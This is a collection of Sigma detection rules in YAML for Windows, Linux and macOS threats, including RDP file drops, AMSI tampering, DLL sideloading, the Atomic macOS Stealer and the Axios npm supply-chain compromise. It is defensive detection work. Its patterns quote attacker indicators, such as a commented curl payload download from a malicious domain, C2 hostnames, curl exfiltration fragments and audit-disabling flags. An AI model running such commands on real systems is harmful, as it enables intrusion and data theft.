title: .RDP File Created By Uncommon Application
id: fccfb43e-09a7-4bd2-8b37-a5a7df33386d
related:
    - id: f748c45a-f8d3-4e6f-b617-fe176f695b8f
      type: derived
status: test
description: |
    Detects creation of a file with an ".rdp" extension by an application that doesn't commonly create such files.
references:
    - https://www.blackhillsinfosec.com/rogue-rdp-revisiting-initial-access-methods/
    - https://web.archive.org/web/20230726144748/https://blog.thickmints.dev/mintsights/detecting-rogue-rdp/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-04-18
modified: 2024-11-01
tags:
    - attack.stealth
logsource:
    product: windows
    category: file_event
detection:
    selection:
        TargetFilename|endswith: '.rdp'
        Image|endswith:
            # Covers browsers
            - '\brave.exe'
            - '\CCleaner Browser\Application\CCleanerBrowser.exe'
            - '\chromium.exe'
            - '\firefox.exe'
            - '\Google\Chrome\Application\chrome.exe'
            - '\iexplore.exe'
            - '\microsoftedge.exe'
            - '\msedge.exe'
            - '\Opera.exe'
            - '\Vivaldi.exe'
            - '\Whale.exe'
            # Covers email clients
            - '\olk.exe' # Outlook
            - '\Outlook.exe'
            - '\RuntimeBroker.exe' # If the windows mail client is used
            - '\Thunderbird.exe'
            # Covers chat applications
            - '\Discord.exe' # Should open the browser for download, but just in case.
            - '\Keybase.exe'
            - '\msteams.exe'
            - '\Slack.exe'
            - '\teams.exe'
    condition: selection
falsepositives:
    - Unknown
level: high

title: AMSI Disabled via Registry Modification
id: aa37cbb0-da36-42cb-a90f-fdf216fc7467
related:
    - id: 7dbbcac2-57a0-45ac-b306-ff30a8bd2981 # Windows AMSI Related Registry Tampering Via CommandLine
      type: similar
status: experimental
description: |
    Detects attempts to disable AMSI (Anti-Malware Scan Interface) by modifying the AmsiEnable registry value.
    Anti-Malware Scan Interface (AMSI) is a security feature in Windows that allows applications and services to integrate with anti-malware products for enhanced protection against malicious content.
    Adversaries may attempt to disable AMSI to evade detection by security software, allowing them to execute malicious scripts or code without being scanned.
references:
    - https://mostafayahiax.medium.com/hunting-for-amsi-bypassing-methods-9886dda0bf9d
    - https://docs.microsoft.com/en-us/windows/win32/amsi/antimalware-scan-interface-portal
    - https://www.mdsec.co.uk/2019/02/macros-and-more-with-sharpshooter-v2-0/
author: Swachchhanda Shrawan Poudel (Nextron Systems)
date: 2025-12-25
tags:
    - attack.defense-impairment
    - attack.t1685
logsource:
    category: registry_set
    product: windows
detection:
    selection:
        TargetObject|endswith: '\Software\Microsoft\Windows Script\Settings\AmsiEnable'
        Details: 'DWORD (0x00000000)'
    condition: selection
falsepositives:
    - Unlikely
level: high
regression_tests_path: regression_data/rules/windows/registry/registry_set/registry_set_amsi_disable/info.yml
simulation:
    - type: atomic-red-team
      name: AMSI Bypass - Create AMSIEnable Reg Key
      technique: T1562.001
      atomic_guid: 728eca7b-0444-4f6f-ac36-437e3d751dc0

title: APT PRIVATELOG Image Load Pattern
id: 33a2d1dd-f3b0-40bd-8baf-7974468927cc
status: test
description: Detects an image load pattern as seen when a tool named PRIVATELOG is used and rarely observed under legitimate circumstances
references:
    - https://web.archive.org/web/20210901184449/https://www.fireeye.com/blog/threat-research/2021/09/unknown-actor-using-clfs-log-files-for-stealth.html
author: Florian Roth (Nextron Systems)
date: 2021-09-07
modified: 2022-10-09
tags:
    - attack.privilege-escalation
    - attack.stealth
    - attack.t1055
    - detection.emerging-threats
logsource:
    category: image_load
    product: windows
detection:
    selection:
        Image|endswith: '\svchost.exe'
        ImageLoaded|endswith: '\clfsw32.dll'
    condition: selection
falsepositives:
    - Rarely observed
level: high

title: Abusable DLL Potential Sideloading From Suspicious Location
id: 799a5f48-0ac1-4e0f-9152-71d137d48c2a
status: test
description: Detects potential DLL sideloading of DLLs that are known to be abused from suspicious locations
references:
    - https://www.trendmicro.com/en_us/research/23/f/behind-the-scenes-unveiling-the-hidden-workings-of-earth-preta.html
    - https://research.checkpoint.com/2023/beyond-the-horizon-traveling-the-world-on-camaro-dragons-usb-flash-drives/
author: X__Junior (Nextron Systems)
date: 2023-07-11
tags:
    - attack.execution
    - attack.t1059
logsource:
    category: image_load
    product: windows
detection:
    selection_dll:
        ImageLoaded|endswith:
            # Note: Add more generic DLLs that cannot be pin-pointed to a single application
            - '\coreclr.dll'
            - '\facesdk.dll'
            - '\HPCustPartUI.dll'
            - '\libcef.dll'
            - '\ZIPDLL.dll'
    selection_folders_1:
        ImageLoaded|contains:
            - ':\Perflogs\'
            - ':\Users\Public\'
            - '\Temporary Internet'
            - '\Windows\Temp\'
    selection_folders_2:
        - ImageLoaded|contains|all:
              - ':\Users\'
              - '\Favorites\'
        - ImageLoaded|contains|all:
              - ':\Users\'
              - '\Favourites\'
        - ImageLoaded|contains|all:
              - ':\Users\'
              - '\Contacts\'
        - ImageLoaded|contains|all:
              - ':\Users\'
              - '\Pictures\'
    condition: selection_dll and 1 of selection_folders_*
falsepositives:
    - Unknown
level: high

title: Add Debugger Entry To Hangs Key For Persistence
id: 833ef470-fa01-4631-a79b-6f291c9ac498
status: test
description: Detects when an attacker adds a new "Debugger" value to the "Hangs" key in order to achieve persistence which will get invoked when an application crashes
references:
    - https://persistence-info.github.io/Data/wer_debugger.html
    - https://www.hexacorn.com/blog/2019/09/20/beyond-good-ol-run-key-part-116/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-07-21
modified: 2023-08-17
tags:
    - attack.persistence
logsource:
    category: registry_set
    product: windows
detection:
    selection:
        TargetObject|contains: '\SOFTWARE\Microsoft\Windows\Windows Error Reporting\Hangs\Debugger'
    condition: selection
falsepositives:
    - This value is not set by default but could be rarly used by administrators
level: high

title: Adwind RAT / JRAT
id: 1fac1481-2dbc-48b2-9096-753c49b4ec71
status: test
description: Detects javaw.exe in AppData folder as used by Adwind / JRAT
references:
    - https://www.hybrid-analysis.com/sample/ba86fa0d4b6af2db0656a88b1dd29f36fe362473ae8ad04255c4e52f214a541c?environmentId=100
    - https://www.first.org/resources/papers/conf2017/Advanced-Incident-Detection-and-Threat-Hunting-using-Sysmon-and-Splunk.pdf
author: Florian Roth (Nextron Systems), Tom Ueltschi, Jonhnathan Ribeiro, oscd.community
date: 2017-11-10
modified: 2022-10-09
tags:
    - attack.execution
    - attack.t1059.005
    - attack.t1059.007
    - detection.emerging-threats
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        - CommandLine|contains|all:
              - '\AppData\Roaming\Oracle'
              - '\java'
              - '.exe '
        - CommandLine|contains|all:
              - 'cscript.exe'
              - 'Retrive'
              - '.vbs '
    condition: selection
level: high

title: Adwind RAT / JRAT File Artifact
id: 0bcfabcb-7929-47f4-93d6-b33fb67d34d1
related:
    - id: 1fac1481-2dbc-48b2-9096-753c49b4ec71
      type: derived
status: test
description: Detects javaw.exe in AppData folder as used by Adwind / JRAT
references:
    - https://www.hybrid-analysis.com/sample/ba86fa0d4b6af2db0656a88b1dd29f36fe362473ae8ad04255c4e52f214a541c?environmentId=100
    - https://www.first.org/resources/papers/conf2017/Advanced-Incident-Detection-and-Threat-Hunting-using-Sysmon-and-Splunk.pdf
author: Florian Roth (Nextron Systems), Tom Ueltschi, Jonhnathan Ribeiro, oscd.community
date: 2017-11-10
modified: 2022-12-02
tags:
    - attack.execution
    - attack.t1059.005
    - attack.t1059.007
logsource:
    category: file_event
    product: windows
detection:
    selection:
        - TargetFilename|contains|all:
              - '\AppData\Roaming\Oracle\bin\java'
              - '.exe'
        - TargetFilename|contains|all:
              - '\Retrive'
              - '.vbs'
    condition: selection
level: high

title: Antivirus Filter Driver Disallowed On Dev Drive - Registry
id: 31e124fb-5dc4-42a0-83b3-44a69c77b271
status: test
description: |
    Detects activity that indicates a user disabling the ability for Antivirus mini filter to inspect a "Dev Drive".
references:
    - https://twitter.com/0gtweet/status/1720419490519752955
author: '@kostastsale, Nasreddine Bencherchali (Nextron Systems)'
date: 2023-11-05
modified: 2024-08-16
tags:
    - attack.defense-impairment
    - attack.t1685
logsource:
    category: registry_set
    product: windows
detection:
    selection:
        TargetObject|endswith: '\FilterManager\FltmgrDevDriveAllowAntivirusFilter'
        Details: 'DWORD (0x00000000)'
    condition: selection
falsepositives:
    - Unlikely
level: high

title: Apache Spark Shell Command Injection - ProcessCreation
id: c8a5f584-cdc8-42cc-8cce-0398e4265de3
status: test
description: Detects attempts to exploit an apache spark server via CVE-2014-6287 from a commandline perspective
references:
    - https://github.com/W01fh4cker/cve-2022-33891/blob/fd973b56e78bca8822caa3a2e3cf1b5aff5d0950/cve_2022_33891_poc.py
    - https://sumsec.me/2022/CVE-2022-33891%20Apache%20Spark%20shell%20command%20injection.html
    - https://github.com/apache/spark/pull/36315/files
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-07-20
tags:
    - attack.initial-access
    - attack.t1190
    - cve.2022-33891
    - detection.emerging-threats
logsource:
    product: linux
    category: process_creation
detection:
    selection:
        ParentImage|endswith: '\bash'
        CommandLine|contains:
            - 'id -Gn `'
            - "id -Gn '"
    condition: selection
falsepositives:
    - Unlikely
level: high

title: Aruba Network Service Potential DLL Sideloading
id: 90ae0469-0cee-4509-b67f-e5efcef040f7
status: test
description: Detects potential DLL sideloading activity via the Aruba Networks Virtual Intranet Access "arubanetsvc.exe" process using DLL Search Order Hijacking
references:
    - https://twitter.com/wdormann/status/1616581559892545537?t=XLCBO9BziGzD7Bmbt8oMEQ&s=09
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-01-22
modified: 2023-03-15
tags:
    - attack.privilege-escalation
    - attack.persistence
    - attack.execution
    - attack.stealth
    - attack.t1574.001
logsource:
    category: image_load
    product: windows
detection:
    selection:
        Image|endswith: '\arubanetsvc.exe'
        ImageLoaded|endswith:
            - '\wtsapi32.dll'
            - '\msvcr100.dll'
            - '\msvcp100.dll'
            - '\dbghelp.dll'
            - '\dbgcore.dll'
            - '\wininet.dll'
            - '\iphlpapi.dll'
            - '\version.dll'
            - '\cryptsp.dll'
            - '\cryptbase.dll'
            - '\wldp.dll'
            - '\profapi.dll'
            - '\sspicli.dll'
            - '\winsta.dll'
            - '\dpapi.dll'
    filter:
        ImageLoaded|startswith:
            - 'C:\Windows\System32\'
            - 'C:\Windows\SysWOW64\'
            - 'C:\Windows\WinSxS\'
    condition: selection and not filter
falsepositives:
    - Unknown
level: high

title: Atlassian Confluence CVE-2022-26134
id: 7fb14105-530e-4e2e-8cfb-99f7d8700b66
related:
    - id: 245f92e3-c4da-45f1-9070-bc552e06db11
      type: derived
status: test
description: Detects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2022-26134
references:
    - https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-06-03
tags:
    - attack.initial-access
    - attack.execution
    - attack.t1190
    - attack.t1059
    - cve.2022-26134
    - detection.emerging-threats
logsource:
    category: process_creation
    product: linux
detection:
    selection:
        # Monitor suspicious child processes spawned by Confluence
        ParentImage|startswith: '/opt/atlassian/confluence/'
        ParentImage|endswith: '/java'
        CommandLine|contains:
            - '/bin/sh'
            - 'bash'
            - 'dash'
            - 'ksh'
            - 'zsh'
            - 'csh'
            - 'fish'
            - 'curl'
            - 'wget'
            - 'python'
    condition: selection
falsepositives:
    - Unknown
level: high

title: Atomic MacOS Stealer - FileGrabber Activity
id: e710a880-1f18-4417-b6a0-b5afdf7e33da
related:
    - id: e710a880-1f18-4417-b6a0-b5afdf7e305a
      type: obsolete
status: experimental
description: |
    Detects suspicious activity associated with Atomic MacOS Stealer (Amos) campaigns, including execution of FileGrabber and curl-based POST requests used for data exfiltration. The rule identifies either the execution of FileGrabber targeting /tmp or the use of curl to POST sensitive user data (including files such as /tmp/out.zip) to remote servers, which are key indicators of Amos infostealer activity.
references:
    - https://www.trendmicro.com/en_us/research/25/i/an-mdr-analysis-of-the-amos-stealer-campaign.html
    - https://hunt.io/blog/macos-clickfix-applescript-terminal-phishing
    - https://github.com/bobby-tablez/TTP-Threat-Feeds/blob/45398914e631f8372c3a9fbcd339ff65ffff1b17/results/2025/10/20251001-161956-trendmicro-atomic-macos-stealer-(amos).yml#L36
    - https://www.jamf.com/blog/infostealers-pose-threat-to-macos/
author: Jason Phang Vern - Onn, Robbin Ooi Zhen Heng (Gen Digital)
date: 2025-11-22
tags:
    - attack.execution
    - attack.t1059.002
    - detection.emerging-threats
logsource:
    category: process_creation
    product: macos
detection:
    selection_curl_post:
        CommandLine|contains|all:
            - 'curl'
            - 'POST'
            - 'user:'
            - '-H '
            - 'BuildID'
            - 'file=@/tmp/out.zip'
            - 'cl: 0'
    selection_filegrabber_exec:
        CommandLine|contains|all:
            - 'FileGrabber'
            - '/tmp'
    condition: 1 of selection_*
falsepositives:
    - Unknown
level: high

title: Atomic MacOS Stealer - Persistence Indicators
id: e710a880-1f18-4417-b6a0-b5afdf7e3023
status: experimental
description: |
    Detects creation of persistence artifacts placed by Atomic MacOS Stealer in macOS systems. Recent Atomic MacOS Stealer variants have been observed dropping these to maintain persistent access after compromise.
references:
    - https://moonlock.com/amos-backdoor-persistent-access
    - https://github.com/bobby-tablez/TTP-Threat-Feeds/blob/45398914e631f8372c3a9fbcd339ff65ffff1b17/results/2025/10/20251001-161956-trendmicro-atomic-macos-stealer-(amos).yml#L44
author: Jason Phang Vern - Onn, Robbin Ooi Zhen Heng (Gen Digital)
date: 2025-11-22
tags:
    - attack.persistence
    - attack.privilege-escalation
    - attack.stealth
    - attack.t1564.001
    - attack.t1543.004
    - detection.emerging-threats
logsource:
    category: file_event
    product: macos
detection:
    selection_user_helper:
        # sh -c curl -o '/Users/<username>/.helper' hxxps://halesmp[.]com/zxc/app
        Image|endswith: '/curl'
        TargetFilename|startswith: '/Users/'
        TargetFilename|endswith: '.helper'
    selection_launchdaemon:
        TargetFilename: '/Library/LaunchDaemons/com.finder.helper.plist'
    condition: 1 of selection_*
falsepositives:
    - Unknown
level: high

title: Attempts of Kerberos Coercion Via DNS SPN Spoofing
id: 0ed99dda-6a35-11ef-8c99-0242ac120002
related:
    - id: b07e58cf-cacc-4135-8473-ccb2eba63dd2
      type: similar
status: experimental
description: |
    Detects the presence of "UWhRC....AAYBAAAA" pattern in command line.
    The pattern "1UWhRCAAAAA..BAAAA" is a base64-encoded signature that corresponds to a marshaled CREDENTIAL_TARGET_INFORMATION structure.
    Attackers can use this technique to coerce authentication from victim systems to attacker-controlled hosts.
    It is one of the strong indicators of a Kerberos coercion attack, where adversaries manipulate DNS records
    to spoof Service Principal Names (SPNs) and redirect authentication requests like in CVE-2025-33073.
    If you see this pattern in the command line, it is likely an attempt to add spoofed Service Principal Names (SPNs) to DNS records,
    or checking for the presence of such records through the `nslookup` command.
references:
    - https://www.synacktiv.com/publications/ntlm-reflection-is-dead-long-live-ntlm-reflection-an-in-depth-analysis-of-cve-2025
    - https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html
author: Swachchhanda Shrawan Poudel (Nextron Systems)
date: 2025-06-20
tags:
    - attack.collection
    - attack.credential-access
    - attack.persistence
    - attack.privilege-escalation
    - attack.t1557.001
    - attack.t1187
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        CommandLine|contains|all:
            - 'UWhRCA'
            - 'BAAAA'
    condition: selection
falsepositives:
    - Unknown
level: high

title: Audit Policy Tampering Via NT Resource Kit Auditpol
id: c6c56ada-612b-42d1-9a29-adad3c5c2c1e
related:
    - id: 0a13e132-651d-11eb-ae93-0242ac130002 # New auditpol version
      type: similar
status: test
description: |
    Threat actors can use an older version of the auditpol binary available inside the NT resource kit to change audit policy configuration to impair detection capability.
    This can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.
references:
    - https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Windows%202000%20Resource%20Kit%20Tools/AuditPol
author: Nasreddine Bencherchali (Nextron Systems)
date: 2021-12-18
modified: 2023-02-21
tags:
    - attack.defense-impairment
    - attack.t1685.001
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        CommandLine|contains:
            - '/logon:none'
            - '/system:none'
            - '/sam:none'
            - '/privilege:none'
            - '/object:none'
            - '/process:none'
            - '/policy:none'
    condition: selection
falsepositives:
    - The old auditpol utility isn't available by default on recent versions of Windows as it was replaced by a newer version. The FP rate should be very low except for tools that use a similar flag structure
level: high

title: Audit Rules Deleted Via Auditctl
id: bed26dea-4525-47f4-b24a-76e30e44ffb0
status: experimental
description: |
    Detects the execution of 'auditctl' with the '-D' command line parameter, which deletes all configured audit rules and watches on Linux systems.
    This technique is commonly used by attackers to disable audit logging and cover their tracks by removing monitoring capabilities.
    Removal of audit rules can significantly impair detection of malicious activities on the affected system.
references:
    - https://www.atomicredteam.io/atomic-red-team/atomics/T1562.012
    - https://linux.die.net/man/8/auditct
author: Mohamed LAKRI
date: 2025-10-17
tags:
    - attack.defense-impairment
    - attack.t1685.004
logsource:
    product: linux
    category: process_creation
detection:
    selection:
        Image|endswith: '/auditctl'
        CommandLine|re: '-D'
    condition: selection
falsepositives:
    - An administrator troubleshooting. Investigate all attempts.
level: high

title: Axios NPM Compromise File Creation Indicators - Linux
id: b7cb840c-11f6-47f7-b3ef-5524739c9077
status: experimental
description: |
    Detects file creation events linked to the Axios NPM supply chain compromise. Axios is a popular JavaScript HTTP client.
    On March 30, 2026, malicious versions (1.14.1, 0.30.4) were published to npm, injecting a dependency ([email protected]) that executed a postinstall script as a cross-platform RAT dropper.
references:
    - https://www.stepsecurity.io/blog/axios-compromised-on-npm-malicious-versions-drop-remote-access-trojan
    - https://www.derp.ca/research/axios-npm-supply-chain-rat/
    - https://www.trendmicro.com/zh_hk/research/26/c/axios-npm-package-compromised.html
    - https://www.elastic.co/security-labs/axios-supply-chain-compromise-detections
    - https://www.virustotal.com/gui/file/e10b1fa84f1d6481625f741b69892780140d4e0e7769e7491e5f4d894c2e0e09
author: Swachchhanda Shrawan Poudel (Nextron Systems)
date: 2026-04-01
tags:
    - attack.initial-access
    - attack.t1195.002
    - attack.command-and-control
    - attack.t1105
    - detection.emerging-threats
logsource:
    category: file_event
    product: linux
detection:
    selection:
        Image|endswith: '/curl'
        TargetFilename: '/tmp/ld.py'
    condition: selection
falsepositives:
    - Highly unlikely
level: high

title: Axios NPM Compromise File Creation Indicators - MacOS
id: 2db0458c-05c9-4069-a26f-77becd9c8c13
status: experimental
description: |
    Detects file creation events linked to the Axios NPM supply chain compromise on macOS devices. Axios is a popular JavaScript HTTP client.
    On March 30, 2026, malicious versions (1.14.1, 0.30.4) were published to npm, injecting a dependency ([email protected]) that executed a postinstall script as a cross-platform RAT dropper.
references:
    - https://www.stepsecurity.io/blog/axios-compromised-on-npm-malicious-versions-drop-remote-access-trojan
    - https://www.derp.ca/research/axios-npm-supply-chain-rat/
    - https://www.trendmicro.com/zh_hk/research/26/c/axios-npm-package-compromised.html
    - https://www.elastic.co/security-labs/axios-supply-chain-compromise-detections
    - https://www.virustotal.com/gui/file/e10b1fa84f1d6481625f741b69892780140d4e0e7769e7491e5f4d894c2e0e09
author: Swachchhanda Shrawan Poudel (Nextron Systems)
date: 2026-04-01
tags:
    - attack.initial-access
    - attack.t1195.002
    - attack.command-and-control
    - attack.t1105
    - detection.emerging-threats
logsource:
    category: file_event
    product: macos
detection:
    selection_curl_download:
        Image|endswith: '/curl'
        TargetFilename: '/Library/Caches/com.apple.act.mond'
    selection_node_shell:
        Image|endswith: '/node'
        TargetFilename: '/tmp/6202033'
    condition: 1 of selection_*
falsepositives:
    - Highly unlikely
level: high

title: Axios NPM Compromise File Creation Indicators - Windows
id: cd6386fa-bb9a-4b67-b006-786b6ab5d2ba
status: experimental
description: |
    Detects file creation events linked to the Axios NPM supply chain compromise. Axios is a popular JavaScript HTTP client.
    On March 30, 2026, malicious versions (1.14.1, 0.30.4) were published to npm, injecting a dependency ([email protected]) that executed a postinstall script as a cross-platform RAT dropper.
    The dropper contacted a C2 server, delivered platform-specific payloads, deleted itself, and replaced package.json to evade detection.
    The attack used cscript.exe (VBScript), curl.exe (C2), and PowerShell masquerading as Windows Terminal.
references:
    - https://www.stepsecurity.io/blog/axios-compromised-on-npm-malicious-versions-drop-remote-access-trojan
    - https://www.derp.ca/research/axios-npm-supply-chain-rat/
    - https://www.trendmicro.com/zh_hk/research/26/c/axios-npm-package-compromised.html
    - https://www.elastic.co/security-labs/axios-supply-chain-compromise-detections
    - https://www.virustotal.com/gui/file/e10b1fa84f1d6481625f741b69892780140d4e0e7769e7491e5f4d894c2e0e09
author: Swachchhanda Shrawan Poudel (Nextron Systems)
date: 2026-04-01
tags:
    - attack.initial-access
    - attack.t1195.002
    - detection.emerging-threats
logsource:
    category: file_event
    product: windows
detection:
    selection_img:
        Image|endswith:
            - '\node.exe'
            - '\powershell.exe'
    selection_fils:
        - TargetFilename:
              - 'C:\ProgramData\wt.exe'
              - 'C:\ProgramData\system.bat'
        - TargetFilename|contains|all:
              - 'C:\Users\'
              - '\AppData\Local\Temp\6202033.vbs'
        - TargetFilename|contains|all:
              - 'C:\Users\'
              - '\AppData\Local\Temp\6202033.ps1'
    condition: all of selection_*
falsepositives:
    - Highly unlikely
level: high

title: Axios NPM Compromise Indicators - Linux
id: 0a23a62d-c5b3-468b-a072-25064a9a8c87
status: experimental
description: |
    Detects the Linux-specific execution chain of the plain-crypto-js malicious npm dependency by Axios NPM package, including payload download via curl and detached execution using nohup and python3.
    On March 30, 2026, malicious versions (1.14.1, 0.30.4) were published to npm, injecting a dependency ([email protected]) that executed a postinstall script as a cross-platform RAT dropper.
    The dropper contacted a C2 server, delivered platform-specific payloads, deleted itself, and replaced package.json to evade detection.
references:
    - https://www.stepsecurity.io/blog/axios-compromised-on-npm-malicious-versions-drop-remote-access-trojan
    - https://www.derp.ca/research/axios-npm-supply-chain-rat/
    - https://www.trendmicro.com/zh_hk/research/26/c/axios-npm-package-compromised.html
    - https://www.elastic.co/security-labs/axios-supply-chain-compromise-detections
    - https://www.virustotal.com/gui/file/e10b1fa84f1d6481625f741b69892780140d4e0e7769e7491e5f4d894c2e0e09
author: Swachchhanda Shrawan Poudel (Nextron Systems)
date: 2026-04-01
tags:
    - attack.initial-access
    - attack.t1195.002
    - attack.execution
    - attack.command-and-control
    - attack.t1059.006
    - attack.t1059.004
    - attack.t1105
    - detection.emerging-threats
logsource:
    category: process_creation
    product: linux
detection:
    selection_node_shell:
        ParentImage|endswith:
            - '/node'
            - '/bun'
        CommandLine|contains|all:
            - 'curl '
            - '/tmp/ld.py'
            - 'python3 '
            - 'nohup '
            - '6202033'
    selection_curl_download:
        Image|endswith: '/curl'
        CommandLine|contains: 'http://sfrclak.com'
    condition: 1 of selection_*
falsepositives:
    - Unlikely
level: high

title: Axios NPM Compromise Indicators - macOS
id: a09ee860-31b3-4586-8a68-0ebd74ce0e5f
status: experimental
description: |
    Detects the macOS-specific execution chain of the plain-crypto-js malicious npm dependency in Axios NPM Package, including AppleScript execution via osascript, payload download, permission modification, execution, and cleanup.
author: Swachchhanda Shrawan Poudel (Nextron Systems)
references:
    - https://www.stepsecurity.io/blog/axios-compromised-on-npm-malicious-versions-drop-remote-access-trojan
    - https://www.derp.ca/research/axios-npm-supply-chain-rat/
    - https://www.trendmicro.com/zh_hk/research/26/c/axios-npm-package-compromised.html
    - https://www.elastic.co/security-labs/axios-supply-chain-compromise-detections
    - https://www.virustotal.com/gui/file/e10b1fa84f1d6481625f741b69892780140d4e0e7769e7491e5f4d894c2e0e09
date: 2026-04-01
tags:
    - attack.initial-access
    - attack.t1195.002
    - attack.execution
    - attack.command-and-control
    - attack.t1059.002
    - attack.t1059.004
    - attack.t1105
    - detection.emerging-threats
logsource:
    category: process_creation
    product: macos
detection:
    selection_osascript:
        CommandLine|contains|all:
            - 'nohup '
            - 'osascript '
            - '/tmp/6202033'
    selection_curl_download:
        CommandLine|contains|all:
            - 'curl '
            - 'packages.npm.org/product'
            - '/Library/Caches/com.apple.act.mond'
    selection_cleanup:
        CommandLine|contains|all:
            - 'rm '
            - '-rf '
            - '/tmp/6202033'
    condition: 1 of selection_*
falsepositives:
    - Unlikely
level: high

title: BaaUpdate.exe Suspicious DLL Load
id: 6e8fe0a8-ba0b-4a93-8f9e-82657e7a5984
related:
    - id: 9f38c1db-e2ae-40bf-81d0-5b68f73fb512 # Suspicious BitLocker Access Agent Update Utility Execution
      type: similar
status: experimental
description: |
    Detects BitLocker Access Agent Update Utility (baaupdate.exe) loading DLLs from suspicious locations that are publicly writable which could indicate an attempt to lateral movement via BitLocker DCOM & COM Hijacking.
    This technique abuses COM Classes configured as INTERACTIVE USER to spawn processes in the context of the logged-on user's session. Specifically, it targets the BDEUILauncher Class (CLSID ab93b6f1-be76-4185-a488-a9001b105b94)
    which can launch BaaUpdate.exe, which is vulnerable to COM Hijacking when started with input parameters. This allows attackers to execute code in the user's context without needing to steal credentials or use additional techniques to compromise the account.
references:
    - https://github.com/rtecCyberSec/BitlockMove
author: Swachchhanda Shrawan Poudel (Nextron Systems)
date: 2025-10-18
tags:
    - attack.stealth
    - attack.t1218
    - attack.lateral-movement
    - attack.t1021.003
logsource:
    category: image_load
    product: windows
detection:
    selection:
        Image|endswith: '\BaaUpdate.exe'
        ImageLoaded|endswith: '.dll'
        ImageLoaded|contains:
            - ':\Perflogs\'
            - ':\Users\Default\'
            - ':\Users\Public\'
            - ':\Windows\Temp\'
            - '\AppData\Local\Temp\'
            - '\AppData\Roaming\'
            - '\Contacts\'
            - '\Favorites\'
            - '\Favourites\'
            - '\Links\'
            - '\Music\'
            - '\Pictures\'
            - '\ProgramData\'
            - '\Temporary Internet'
            - '\Videos\'
    condition: selection
falsepositives:
    - Unknown
level: high

title: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
id: a7c3d773-caef-227e-a7e7-c2f13c622329
related:
    - id: f5647edc-a7bf-4737-ab50-ef8c60dc3add
      type: obsolete
status: test
description: |
    Detects attackers using tooling with bad opsec defaults.
    E.g. spawning a sacrificial process to inject a capability into the process without taking into account how the process is normally run.
    One trivial example of this is using rundll32.exe without arguments as a sacrificial process (default in CS, now highlighted by c2lint), running WerFault without arguments (Kraken - credit am0nsec), and other examples.
references:
    - https://blog.malwarebytes.com/malwarebytes-news/2020/10/kraken-attack-abuses-wer-service/
    - https://www.cobaltstrike.com/help-opsec
    - https://twitter.com/CyberRaiju/status/1251492025678983169
    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/regsvr32
    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/rundll32
    - https://learn.microsoft.com/en-us/dotnet/framework/tools/regasm-exe-assembly-registration-tool
    - https://learn.microsoft.com/en-us/dotnet/framework/tools/regsvcs-exe-net-services-installation-tool
author: Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth (Nextron Systems), Christian Burkard (Nextron Systems)
date: 2020-10-23
modified: 2024-08-15
tags:
    - attack.stealth
    - attack.t1218.011
logsource:
    category: process_creation
    product: windows
detection:
    selection_werfault:
        Image|endswith: '\WerFault.exe'
        CommandLine|endswith: 'WerFault.exe'
    selection_rundll32:
        Image|endswith: '\rundll32.exe'
        CommandLine|endswith: 'rundll32.exe'
    selection_regsvcs:
        Image|endswith: '\regsvcs.exe'
        CommandLine|endswith: 'regsvcs.exe'
    selection_regasm:
        Image|endswith: '\regasm.exe'
        CommandLine|endswith: 'regasm.exe'
    selection_regsvr32:
        Image|endswith: '\regsvr32.exe'
        CommandLine|endswith: 'regsvr32.exe'
    filter_optional_edge_update:
        ParentImage|contains: '\AppData\Local\Microsoft\EdgeUpdate\Install\{'
        Image|endswith: '\rundll32.exe'
        CommandLine|endswith: 'rundll32.exe'
    filter_optional_chromium_installer:
        # As reported in https://github.com/SigmaHQ/sigma/issues/4570 and others
        ParentImage|contains:
            - '\AppData\Local\BraveSoftware\Brave-Browser\Application\'
            - '\AppData\Local\Google\Chrome\Application\'
        ParentImage|endswith: '\Installer\setup.exe'
        ParentCommandLine|contains: '--uninstall '
        Image|endswith: '\rundll32.exe'
        CommandLine|endswith: 'rundll32.exe'
    condition: 1 of selection_* and not 1 of filter_optional_*
falsepositives:
    - Unlikely
level: high

title: Base64 Encoded PowerShell Command Detected
id: e32d4572-9826-4738-b651-95fa63747e8a
status: test
description: Detects usage of the "FromBase64String" function in the commandline which is used to decode a base64 encoded string
references:
    - https://gist.github.com/Neo23x0/6af876ee72b51676c82a2db8d2cd3639
author: Florian Roth (Nextron Systems)
date: 2020-01-29
modified: 2023-01-26
tags:
    - attack.stealth
    - attack.t1027
    - attack.execution
    - attack.t1140
    - attack.t1059.001
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        CommandLine|contains: '::FromBase64String('
    condition: selection
falsepositives:
    - Administrative script libraries
level: high

title: Base64 MZ Header In CommandLine
id: 22e58743-4ac8-4a9f-bf19-00a0428d8c5f
status: test
description: Detects encoded base64 MZ header in the commandline
references:
    - https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-07-12
tags:
    - attack.execution
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        CommandLine|contains:
            - 'TVqQAAMAAAAEAAAA' # MZ..........
            - 'TVpQAAIAAAAEAA8A'
            - 'TVqAAAEAAAAEABAA'
            - 'TVoAAAAAAAAAAAAA'
            - 'TVpTAQEAAAAEAAAA'
    condition: selection
falsepositives:
    - Unlikely
level: high

title: Binary Padding - MacOS
id: 95361ce5-c891-4b0a-87ca-e24607884a96
status: test
description: Adversaries may use binary padding to add junk data and change the on-disk representation of malware. This rule detect using dd and truncate to add a junk data to file.
references:
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027.001/T1027.001.md
